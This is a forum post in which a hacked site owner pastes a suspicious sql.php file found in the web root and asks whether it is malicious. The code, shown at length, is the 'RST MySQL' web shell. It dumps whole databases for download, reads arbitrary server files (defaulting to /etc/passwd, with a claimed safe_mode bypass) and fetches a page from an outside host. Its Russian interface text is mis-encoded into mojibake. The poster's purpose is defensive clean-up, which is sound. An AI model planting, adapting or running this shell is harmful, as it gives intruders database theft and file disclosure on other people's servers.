Hack File? Suspicious Sql.php on Root....


ttmw


My site recently got hacked and I'm trying to get rid of all the hacker files and search for anything suspicious... I've just come across a file in my root folder called sql.php that looks a little suspicious. I was wondering if anyone could confirm it is either useless or definitely a spam/hack file. Maybe it will stop someone else getting any problems too. I've had to trim it to fit in a post, but I'm guessing someone will be able to tell sharpish if it's a little dodgy...

<?php
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@set_magic_quotes_runtime(0); // strip slashes when reading data from a file
$self=$HTTP_SERVER_VARS['PHP_SELF'];
if(!ini_get("register_globals")){ 
import_request_variables("GPC"); 
}
// If PHP added slashes, strip them. Slashes are removed both from the global
// arrays and from all variables created when register_globals=on
if (get_magic_quotes_gpc()) strips($GLOBALS);
function strips(&$el) { 
 if (is_array($el)) { 
   foreach($el as $k=>$v) { 
     if($k!='GLOBALS') { 
       strips($el[$k]); 
     } 
   } 
 } else { 
   $el = stripslashes($el); 
 } 
}
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
   $file = "C:\\tmp\\dump_".$db.".sql";
   $p_v=$SystemRoot."\my.ini";
   $os="win";
} else {
   $file = "/tmp/dump_".$db.".sql"; 
   $p_v="/etc/passwd";
}
if ($HTTP_GET_VARS['send']=='send_http') {
function download($file, $type = false, $name = false, $down = false) { 
if(!file_exists($file)) exit; 
if(!$name) $name = basename($file); 
if($down) $type = "application/force-download"; 
else if(!$type) $type = "application/download"; 
$disp = $down ? "attachment" : "inline";
header("Content-disposition: ".$disp."; filename=".$name); 
header("Content-length: ".filesize($file)); 
header("Content-type: ".$type); 
header("Connection: close"); 
header("Expires: 0");
set_time_limit(0); 
readfile($file); 
unlink($file);
exit; 
} 
if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['dump']=='bd'){
  $host = $HTTP_SERVER_VARS["SERVER_NAME"];
  $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
  $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
  mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
  if (sizeof($tabs) == 0) { 
     // get the list of tables in the database
     $res = mysql_query("SHOW TABLES FROM $db", $connection); 
     if (mysql_num_rows($res) > 0) { 
        while ($row = mysql_fetch_row($res)) { 
           $tabs[] .= $row[0]; 
        } 
     } 
  } 
      // open the file for writing the dump
  $fp = fopen($file, "w"); 
  fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
  date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n"); 
  foreach($tabs as $tab) {       
     if ($add_drop) { 
        fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n");
     }        
     // get the query text that creates the table structure
     $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error()); 
     $row = mysql_fetch_row($res); 
     fputs($fp, $row[1].";\n\n"); 

     // get the table data
     $res = mysql_query("SELECT * FROM `$tab`", $connection); 
     if (mysql_num_rows($res) > 0) { 
        while ($row = mysql_fetch_assoc($res)) { 
           $keys = implode("`, `", array_keys($row)); 
           $values = array_values($row); 
           foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
           $values = implode("', '", $values); 
           $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
           fputs($fp, $sql); 
        } 
     } 
     fputs ($fp, "#---------------------------------------------------------------------------------\n\n"); 
  } 
  fclose($fp);
}
if ($HTTP_GET_VARS['strukt']=='d_strukt'){
  $host = $HTTP_SERVER_VARS["SERVER_NAME"];
  $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
  $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
  mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
  $fp = fopen($file, "w"); 
  fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
  date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
     // get the query text that creates the table structure
     $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
     $row = mysql_fetch_row($res); 
     fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
     fputs($fp, $row[1].";\n\n");        
     // get the table data
     $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
     if (mysql_num_rows($res) > 0) { 
        while ($row = mysql_fetch_assoc($res)) { 
           $keys = implode("`, `", array_keys($row)); 
           $values = array_values($row); 
           foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
           $values = implode("', '", $values); 
           $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
           fputs($fp, $sql); 
        } 
     }

  fclose($fp); 
}
if ($HTTP_GET_VARS['strukt']=='t_strukt'){
  $host = $HTTP_SERVER_VARS["SERVER_NAME"];
  $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
  $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
  mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
  $fp = fopen($file, "w"); 
  fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
  date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
     $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
     $row = mysql_fetch_row($res); 
     fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
     fputs($fp, $row[1].";\n\n");   
  fclose($fp);
}
if ($HTTP_GET_VARS['strukt']=='d'){
  $host = $HTTP_SERVER_VARS["SERVER_NAME"];
  $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
  $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
  mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
  $fp = fopen($file, "w"); 
     $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
     if (mysql_num_rows($res) > 0) { 
        while ($row = mysql_fetch_assoc($res)) { 
           $keys = implode("`, `", array_keys($row)); 
           $values = array_values($row); 
           foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
           $values = implode("', '", $values); 
           $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
           fputs($fp, $sql); 
        } 
     } 
  fclose($fp); 
}
download($f_dump);
}
function send_header() {
  header("Content-type: image/gif");
  header("Cache-control: public");
  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  header("Cache-control: max-age=".(60*60*24*7));
  header("Last-Modified: ".date("r",filemtime(__FILE__)));
}
if ($HTTP_GET_VARS['img']=='st_form_bg') {
  $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
  send_header();
  echo base64_decode($st_form_bg);
}
if ($HTTP_GET_VARS['img']=='bg_f') {
$bg_f='R0lGODlhAQARAMQAANXW1+7w8uvt79TV18jJye3w8+zu8Ofp7MfIydzd3+fo687P0Nvc3eHi5eP'.
     'k5sPDw87OzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BA'.
     'AAAAAALAAAAAABABEAAAUP4IMsQOIcRlAISsMMEBECADs=';
  send_header();
  echo base64_decode($bg_f);
}
if ($HTTP_GET_VARS['img']=='b_close') {
$b_close='R0lGODlhdwAUAOYAANWEhdJYWNiwsc0PD9aTk88sLNA7O9rNztehotR1dk0AANQnJ4IAANc1Ndg9PWYAAL4'.
        'AAM8PD6AAANg8POiLi8yEhb0sLIYAAGIAAMRYWOeGhtc5Oc8NDeR3d1gAANuEhU4AAKcAANJbW9Z1dt1XV8'.
        'IAAONzc8QAAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK'.
        'c4MDNROT0UAAKwAANtJSdQqKtAUFOqYmMwCAuR2dtuiou2jo95bW8l1dtc3N+ucnI4AAJMAAHoAAD4AANWK'.
        'i+yfn5IAAOuZmdaVls4KCtlAQJQAAEAAANtMTOFra3EAAJEAALgAAOFpaWcAAOeFhXAAAN9dXeqVlTcAANg'.
        '6Ol4AANNnZ9m/wLUAANEbG9tKSoQAAOiOjuaCglYAAOJsbDQAANvc3cwAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
        'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAB3ABQAAAf/gFFFKk9ha4eIiYqLjI2Oj5CRk'.
        'pOJGiY4GxwUQUkoFGygoaKjpKWmp6ipqqusokNGSBwzHV4UGh1uubq7vL2+v8DBwsPExbtgYy5nSjJYK1wk'.
        'adLT1NXW19jZ2tvc1h8tRB/d2BsxW0tZPldpVD9o7/Dx8vP09fb3+PnxO3D9cCP66k05UwWGBwcTGiyIEKe'.
        'hw4cQI0qcSLGixYsOB8A5UKYAxooQJDB4oAChQoYNBfgzEIeAvwQNzcg0w3KASzhmBrQ0A2CjTgJm4pShac'.
        'BMmThmCAg1OnQmgaEsIwLteeDnyzg9AwCA2fCmgAFFZ8pUGkdAzoYhR5ZMuLChgQMA/xDgjAP3ZhwD/Q7MV'.
        'UlAJYI4/QjohdkPKZwBPcvgRVCgXxmg/Yyq9Bgx8GC6AOz66/dXLgK+QyNDFgrnL1qRJE22bTggQBk4AOK0'.
        '7gmHdAKNAPAKCBAAZ2MBcXoD+A249uTXCfTCYUm8OIDhD4kLl621n8acGuE0n1s8ZW0z2h2mTc0WJWmfrzf'.
        'OvWmdtj8Er2P3ThCfeGGXB5Q3jC97c22H/M2Xnl5mTGdYAnAcBVhQ1zWUWGkPjbfWSRC95gQcwE0HXnXPJf'.
        'hQVi0tl1V8DYK3HHcgTqfXh3AEEKIIGAYHm4E4gYicjLGdF554qE24WoIBqCQFhgHodVQ/AKhUxv9rHJUhQ'.
        'FEJvhYUeJAhIFdsjvVGFng69SSAS0E5BN6SOPW2m5HZBRllaWXo5VFiDfUGYYQ9qsYQXv585V8BeAbWkFz+'.
        'FOePR/75o1iMCCpYWFmbRdXQntkNipU/OSq3nHeO9kMZj2rZ6RBvlLWmk0UFBMAchqV+pCpEv6XKWgCjOlR'.
        'qrHe5ONFrptHZaXmrWsRfr8D+CqxF/TjKKUkv5MCCDiWc4eyz0EYrrbQZVGDBtNhmq62z1V677bfSWlDBEd'.
        'OGQMMXHvAAhBA3pKCFGvDGK++89NZr77345qvvvvzKywQGIFjxxgk9QFEDBm0krPDCDDfs8MMQRyzxxBRXv'.
        'DArCDa8oXEIF3ShgBgahyzyyCSXbPLJKKes8soso3wBGU20LPPMNNdsc8qBAAA7';
  send_header();
  echo base64_decode($b_close);
} 
$n_img = create_function('$tag,$f_n,$img_c', 'print \'<\'.$tag.\'>\';$f_n("$img_c");');
$h_error="<br><table align=center width=500 height=70 bgcolor=red><b>Œ¯Ë·Í‡ ‚ Á‡ÔÓÒÂ:</b><tr><td align=center><br><h5>";
$f_error="</h5></td></tr></table>
<CENTER><FORM><INPUT type=\"button\" value=\"   << Õ‡Á‡‰    \" onClick=\"history.go(-1)\"><BR>
</FORM></CENTER>
</td></tr></table></td></tr></table>
<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
<tr><td>
     <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
        <tr>
           <td align=center>
               free script ©RusH Security Team 
           </td>
        </tr>
     </table> 
</td></tr>
</table>
</td></tr></table>";

print "
 <html><HEAD><TITLE>RST MySQL</TITLE>

 <META http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\">
  <style>
  td {  
  font-family: verdana, arial, ms sans serif, sans-serif;  
  font-size: 11px;  
  color: #000000; 
  }
  BODY {
  margin-top: 4px; 
  margin-right: 4px; 
  margin-bottom: 4px; 
  margin-left: 4px;
  scrollbar-face-color: #b6b5b5;
  scrollbar-highlight-color: #758393; 
  scrollbar-3dlight-color: #000000; 
  scrollbar-darkshadow-color: #101842; 
  scrollbar-shadow-color: #ffffff; 
  scrollbar-arrow-color: #000000;
  scrollbar-track-color: #ffffff; 
  }
  A:link {COLOR:blue; TEXT-DECORATION: none}
  A:visited { COLOR:blue; TEXT-DECORATION: none}
  A:active {COLOR:blue; TEXT-DECORATION: none}
  A:hover {color:red;TEXT-DECORATION: none}
  input, textarea, select {
  background-color: #EBEAEA;
  border-style: solid;
  border-width: 1px;
  font-family: verdana, arial, sans-serif;
  font-size: 11px;
  color: #333333;
  padding: 0px;
  }
 </style></HEAD><BODY>";


if ($sapi_type == "cgi") {
   $php_type="CGI";
} else {
   $php_type="ÏÓ‰Ûθ";
}

$form_file="
       <table width=80% align=center border=0>
       <tr><td align=center>◊ÚÂÌË ÔÓËÁ‚ÓθÌӄӠهȷ, ÒÂ‚Â‡ ( <b>$server</b> )</td></tr>
       <tr><td>
       <table cellpadding=5 cellspacing=1 bgcolor=#FFFFFF border=0>
       <tr bgcolor=#DBDCDD><td align=center>
       œË ÛÒÎÓ‚ËË, ˜ÚÓ Ù‡ÈÎ ‰ÓÒÚÛÔÂÌ ‰Îˇ <b>˜ÚÂÌˡ</b> Ë ÔË
       ̇΢ËË Û ÔÓθÁÓ‚‡ÚÂΡ ÔË‚Ë΄ËË <b>FILE</b>, <b>SELECT</b>,
       <b>CREATE</b>, Ô‡‚ËθÌÓÏ ÔÛÚË Ë ËÏÂÌË - ‚ÓÁÏÓÊÌÓ ˜ÚÂÌË ÔÓËÁ‚ÓθÌÓ„Ó Ù‡È·.
       Œ·ıÓ‰ Ó„‡Ì˘ÂÌËÈ ÔË <b>safe_mode</b> Ë <b>safe_basedir</b>
       </td></tr></table></td></tr>
       <form method=\"get\" action=\"$self?f=x_file\">
       <input type=\"hidden\" name=\"s\" value=\"$s\">                
       <input type=\"hidden\" name=\"server\" value=\"$server\">
       <input type=\"hidden\" name=\"port\" value=\"$port\">
       <input type=\"hidden\" name=\"login\" value=\"$login\">
       <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
       <tr><td align=center><br>œÓÎÌ˚È ÔÛÚ¸ Í Ù‡ÈÎÛ: <input type=\"text\" name=\"p_file\" value=\"$p_v\" size=\"40\">    
       <input type=\"submit\" value=\"ÔÓ͇Á‡Ú¸ Ù‡ÈÎ\">    </td></tr></table><br>";

$start_form="<br>
<table align=center border=0 width=100% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
<tr>
  <td>
<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
<tr><td>
     <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
        <tr>
           <td width=25>
               <font face=Webdings size=6>Ņ</font>
           </td>
           <td>
               <font size=4><b>RST MySQL</b></font> <font color=#FFFFFF><b>v(2.0)</b></font>
           </td>
           <td width=33% align=right>
               ".date ("j F- Y- g:i")."  
           </td>
        </tr>
     </table> 
</td></tr>
</table>

</td></tr>
<tr><td>

<table align=center border=0 width=80% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
<tr>
  <td bgcolor=#DBDCDD valign=top width=200><br>
       <center><b>”ÚËÎËÚ‡ ‰Îˇ ‡·ÓÚ˚ Ò MySQL</b></center><hr width=98%>
       <li>œÓÒÏÓÚ ·‡Á Ë Ú‡·Îˈ.
       <li>œÓËÁ‚ÓθÌ˚ Á‡ÔÓÒ˚ Í ¡ƒ.
       <li>–‰‡ÍÚËÓ‚‡ÌË ·‡Á Ë Ú‡·Îˈ.
       <li>ƒ‡ÏÔ˚ ¡ƒ ËÎË Ú‡·Îˈ.<hr width=98%>
       Type - FREE<br>
       Home page: <a href=http://rst.void.ru><b>http://rst.void.ru</b></a>
       <center><br><br><font face=Webdings size=+18 color=#B6B5B5>¨</font><center>
  </td>
  <td background=".$self."?img=st_form_bg bgcolor=#E6E7E9><center><font size=2>
       <br>ƒÎˇ ÒÓ‰ËÌÂÌˡ Ò ÒÂ‚ÂÓÏ MySQL ‚‚‰ËÚ <b>»Ãfl</b>, <b>œ¿–ŒÀ‹</b> (ÔÓθÁÓ‚‡ÚÂΡ MySQL) Ë ËÏˇ <b>’Œ—“¿</b>.</font></center><br>
       <li>≈ÒÎË ÎÓ„ËÌ ˛ÁÂ‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ ËÏˇ ‚·‰Âθˆ‡ ÔÓˆÂÒÒ‡.
       <li>≈ÒÎË Ô‡Óθ ˛ÁÂ‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ ÔÛÒÚÓÈ Ô‡Óθ.
       <li>≈ÒÎË ËÏˇ Ò‚‚Â‡ mysql Ì Û͇Á‡ÌÓ ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ <b>localhost</b>
       <li>≈ÒÎË ÔÓÚ ‰Îˇ Ò‚‚Â‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ  ÔÓÚ ÔÓ ÛÏÓΘ‡Ì˲, Ó·˚˜ÌÓ (<b>3306</b>)<br><br>
       <center>¬ÂÒˡ PHP (<b>".phpversion()."</b>)          ID PHP script (<b>".get_current_user( )."</b>)</center>
       <br><table align=center>
       <tr><td>ËÏˇ ˛ÁÂ‡ MySQL</td><td align=right>Ô‡Óθ ˛ÁÂ‡ MySQL </td></tr>
       <form method=\"get\" action=\"$self\">
       <input type=\"hidden\" name=\"s\" value=\"y\">
       <tr>
         <td><input type=\"text\" name=\"login\" value=\"root\" maxlength=\"64\"></td>
         <td align=right><input type=\"text\" name=\"passwd\" value=\"$passwd\" maxlength=\"64\"></td>
       </tr>
       <tr><td>—Â‚Â MySQL</td><td>ÔÓÚ</td></tr>
       <tr>                
         <td><input type=\"text\" name=\"server\" value=\"localhost\" maxlength=\"64\"></td>
         <td><input type=\"text\" name=\"port\" value=\"3306\" maxlength=\"6\" size=\"3\">
         <input type=\"submit\" value=\"ÔÓ‰Íβ˜ËÚ¸Òˇ\"></td>
       </tr></table><br>        
  </td>
</tr>
</table>

</td></tr>
<tr><td>
<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
<tr><td>
     <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
        <tr>
           <td align=center>
               free script ©RusH Security Team 
           </td>
        </tr>
     </table> 
</td></tr>
</table>
</td></tr></table><center><font size=-1 color=#D0D1D2>(coded by dinggo)</font></center>
";

if ($os =='win') {
$os="OS- <b>".$HTTP_ENV_VARS["OS"]."</b>";
}else{
  $str_k=$_ENV["BOOT_FILE"];
  $k=preg_replace ("/[a-zA-Z\/]/","", $str_k);
  $os="OS\Kernel: <b>".$_ENV["BOOT_IMAGE"].$k."</b>";

}

if (!isset($s) || $HTTP_GET_VARS[s] != 'y') { print $start_form;
$serv = array(127,192,172,10);
$adrr=@explode('.', $HTTP_SERVER_VARS["SERVER_ADDR"]);
if (!in_array($adrr[0], $serv)) {
  // when a new version of the utility appears, show that a new version
  // is available and offer to download it from the site
  @print "<img src=\"http://rst.void.ru/version_sql/version.php\" border=0 height=0>";
  @readfile ("http://rst.void.ru/version_sql/version.php");  
}
exit;
}

$form_ad_b="<br>
<table width=80% align=center border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF> 
<tr>
  <td>
  <table width=100% align=center border=0 cellpadding=4 cellspacing=0 bgcolor=#DBDCDD> 
   <td>
     MySQL <b>$server</b> v.(<b>".mysql_get_server_info()."</b>)
  </td>
  <td align=center>
     <b>".$HTTP_SERVER_VARS["SERVER_SOFTWARE"]."</b>
  </td>
  <td align=right>
     ¬ÂÒˡ PHP (<b>".phpversion()."</b>) $php_type
  </td>
</tr>
<tr bgcolor=#DBDCDD>
  <td>
     IP:<b>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</b> Name:<b>".$HTTP_SERVER_VARS["SERVER_NAME"]."</b>
  </td>
  <td align=center>
     ID PHP script (<b>".get_current_user( )."</b>)
  </td>
  <td align=right>
     $os
  </td>
</tr>
</table>
</td></tr></table>
<table width=80% align=center border=0 cellpadding=5 cellspacing=1> 
<tr>
  <td>
       <a href=\"$self?s=$s&stat=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>—Ú‡ÚËÒÚË͇ MySQL</b></a>
  </td>
  <td align=center>
       <a href=\"$self?s=$s&php=ok\" target=\"_blank\"><b>»ÌÙÓχˆËˇ PHP (ALL)</b></a>
  </td>
  <td align=right>
       <a href=\"$self?s=$s&proc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÓˆÂÒÒ˚ MySQL </b></a>
  </td>
</tr>
<tr>
  <td>
       <a href=\"$self?s=$s&apc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÂÂÏÂÌÌ˚ Apache </b></a>
  </td>
  <td align=center>
       <a href=\"$self?s=$s&var=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÂÂÏÂÌÌ˚ MySQL </b></a> 
  </td>
  <td align=right>
       <a href=\"$self?s=$s&f=x_file&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"œÓÒÏÓÚ ÔÓËÁ‚ÓθÌÓ„Ó Ù‡È· ÒÂ‚Â‡ ‰‡Ê ÔË ‚Íβ˜ÂÌÓÏ safe_mode Ë safe_mode_exec_dir\"><b>‘‡ÈÎ *?</b></a>
  </td>
</tr>
</table><br>

<table width=300 align=center cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
<tr bgcolor=#DBDCDD><td>
<table align=center cellpadding=0 cellspacing=0>
<tr bgcolor=#DBDCDD>
  <td> <table cellpadding=4><tr><td><b>—ÓÁ‰‡Ú¸ ÌÓ‚Û˛ ·‡ÁÛ ‰‡ÌÌ˚ı</b></td></tr><tr><td>
       <form method=\"get\" action=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\">
       <input type=\"hidden\" name=\"s\" value=\"$s\">
       <input type=\"hidden\" name=\"server\" value=\"$server\">
       <input type=\"hidden\" name=\"port\" value=\"$port\">
       <input type=\"hidden\" name=\"login\" value=\"$login\">
       <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
       <input type=\"text\" name=\"new_db\" value=\"\" maxlength=\"64\">
       <input type=\"submit\" value=\"ÒÓÁ‰‡Ú¸\"></td>
       </tr></table>
  </td>
</tr>
</table>
</td>    
</tr></table></form>

<table width=80% align=center border=0 cellpadding=0>
<tr align=right>
  <td width=85%></td>
  <td width=15>
   <a href=$self><img src=".$self."?img=b_close border=0 title=close></a>
 </td>
</tr>
</table>
";

$cnt_b=mysql_num_rows(mysql_list_dbs());  // number of databases on the MySQL server
print "
<table align=center border=0 width=100% cellpadding=1 cellspacing=0 bgcolor=#FFFFFF>
<tr>
  <td>
<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
<tr><td>
     <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
        <tr>
           <td>
               <font face=Webdings size=6>Ņ</font>
           </td>
           <td width=33%>
               <font size=4><b>RST MySQL</b></font>
           </td>
           <td width=33% align=center>
               <font color=blue><b>$server</b></font> [CONNECTION Ok]   ¬ÒÂ„Ó ·‡Á: <b>$cnt_b</b>
           </td>
           <td width=33% align=right>
               ".date ("j F- Y- g:i")."  
           </td>
        </tr>
     </table> 
</td></tr>
</table>

</td></tr>
<tr><td>

<table background=".$self."?img=send_img align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF>
<tr>
  <td bgcolor=#DBDCDD valign=top width=170>";

if (isset($server)&&isset($port)&&isset($login)&&isset($passwd)){
$connection = mysql_connect($server.":".$port, $login, $passwd) or die("$header<table align=center width=80% bgcolor=red><tr><br>Œ¯Ë·Í‡ ÒÓ‰ËÌÂÌˡ Ò MySQL ÒÂ‚ÂÓÏ <b>$server</b><td><center><font size=2><b>".mysql_error()."</b></font></center><br><b>¬ÂÓˇÚÌ˚ ӯ˷ÍË:</b><li>Õ Ô‡‚ËθÌ˚È ‡‰ÂÒ ÒÂ‚Â‡ <b>$server</b><li>Õ Ô‡‚ËθÌ˚È ÌÓÏÂ ÔÓÚ‡ <b>$port</b><li>Õ ‚ÂÌÓ ËÏˇ (login) ˛ÁÂ‡ mysql <b>$login</b><li>Õ ‚ÂÌ˚È Ô‡Óθ (password) ˛ÁÂ‡ mysql <b>$passwd</b><li>ƒÓÒÚÛÔ Í ÒÂ‚ÂÛ $server Á‡Ô¢ÂÌ Ò ‡‰ÂÒ‡ <b>".getenv('REMOTE_ADDR')."</b><li>”‰‡ÎÂÌÌ˚È ÒÂ‚Â ‚ÂÏÂÌÌÓ Ì ‰ÓÒÚÛÔÂÌ</td></tr></table><br></td></tr></table><script>alert('Õ ‚ÓÁÏÓÊÌÓ ÛÒÚ‡ÌÓ‚ËÚ¸ ÒÓ‰ËÌÂÌËÂ Ò MySQL ÒÂ‚ÂÓÏ $server \\n\\n œÓ‚Â¸Ú Ô‡‚ËθÌÓÒÚ¸ ‚ıÓ‰ˇ˘Ëı ‰‡ÌÌ˚ı:\\n\\nÒÂ‚Â $server\\nÔÓÚ $port\\nËÏˇ $login\\nÔ‡Óθ $passwd');</script><head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self'></head>");
}


/*---------------------- L E F T   B L O C K (menu bd)! -------------------*/
/* Show all databases on the server */
if ($connection&&!isset($db)) {
  print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
          "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÂÌÛÚ¸Òˇ ‚ ̇˜‡ÎÓ Ë Ó·ÌÓ‚ËÚ¸ ÒÔËÒÓÍ ·‡Á\"><font color=green><b>".
          "œÓ͇Á‡Ú¸ ‚Ò ·‡Á˚</b></font></a></td></tr></table>";

  $result = mysql_list_dbs($connection) or die("$h_error<b>".mysql_error()."</b>$f_error");
  while ( $row=mysql_fetch_row($result) ){
      $cnt_title=mysql_num_rows(mysql_list_tables($row[0])); // number of tables in the database
      print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr><td bgcolor=#DBDCDD>";
      if ($cnt_title < 1) {
        print "<a href=\"$_SERVER[php_SELF]?s=$s&db=$row[0]&cr_tbl=new&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÒÂ„Ó Ú‡·Îˈ $cnt_title\"><b>$row[0]</b></a>";
      }else{
        print "<a href=\"$_SERVER[php_SELF]?s=$s&db=$row[0]&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÒÂ„Ó Ú‡·Îˈ $cnt_title\"><b>$row[0]</b></a>";
      }
      print "</td></tr></table>";
   }
}

// list of tables in the database
if (isset($db)){          
 $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_error<head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>");
  print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
          "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\"><font color=green><b>".
          "œÓ͇Á‡Ú¸ ‚Ò ·‡Á˚</b></font></a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";

 print "<table cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=silver align=center>".
       "---[ <a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db\" title=\"Ó·ÌÓ‚ËÚ¸ ÒÔËÒÓÍ Ú‡·Îˈ\"><b>$db</b></a>".
       " ]---</a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";

 while ( $row=mysql_fetch_array($result) ){
   // get the number of rows (records) in the table
   $count=mysql_query ("SELECT COUNT(*) FROM $row[0]");
   $count_row= mysql_fetch_array($count);
   print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>".
         "<tr><td bgcolor=#DBDCDD>";
   if ($count_row[0] < 1) { 
      print "<a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&nn_row=ok\">$row[0]</a> ($count_row[0])</td></tr></table>";  
   }else{
       print "<a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&limit_start=0&limit_count=5\">$row[0]</a> ($count_row[0])</td></tr></table>";  
   }
   @mysql_free_result($count);
 }
} 

/*---------------------- END L E F T   B L O C K (menu bd)! -------------------*/

print "
  </td>
